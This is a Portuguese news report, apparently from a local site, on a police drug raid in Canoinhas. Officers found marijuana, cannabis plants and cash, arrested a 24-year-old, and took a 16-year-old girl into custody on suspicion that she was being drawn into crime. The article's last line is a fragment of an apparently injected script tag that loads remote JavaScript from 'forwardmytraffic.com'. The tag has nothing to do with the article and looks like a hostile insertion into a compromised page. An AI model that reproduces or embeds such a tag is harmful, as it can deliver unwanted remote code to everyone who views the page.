Trata-se de ocorrência de tráfico de drogas, posse de drogas e corromper ou facilitar a corrupção de menor de 18 anos, com ele praticando infração penal ou induzindo-o a praticá-la.
Nesta sexta-feira, 29, por volta das 12h30, equipes da PM de Canoinhas realizavam ações de polícia ostensiva pelo bairro Campo da Água Verde, no loteamento Multidão, quando visualizaram dois jovens saindo de uma residência já conhecida pelo comércio de entorpecentes.
Os jovens ao visualizar a equipe PM correram novamente em direção à residência, sendo logo abordado pelos policiais. Efetuado busca pessoal em quatro jovens e uma jovem que estavam no local, sendo localizado com os jovens de 19 e 22 anos de idade, uma bucha de maconha, com cada um.
Na residência de um jovem com 24 anos de idade foi localizado um torrão de maconha totalizando 50 gramas, dois vasos com maconha, sendo cinco pés de maconha, R$116,00 em espécie e outros objetos que o proprietário não sabe indicar a procedência, que provavelmente é oriundo de furto.
No local estava também uma adolescente com 16 anos de idade, que estava na residência, local de uso de drogas, surgindo neste sentido claras características que o proprietário da residência deve corromper ou facilitar a corrupção de menor de 18 anos, com ele praticando infração penal ou induzindo-o a praticá-la.
Diante dos fatos supra narrados foi dado voz de prisão ao jovem com 24 anos e proprietário da residência e conduzido os outros dois jovens, para depoimentos na Delegacia de Polícia Civil. A adolescente também foi conduzida, para providencias cabíveis.
… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>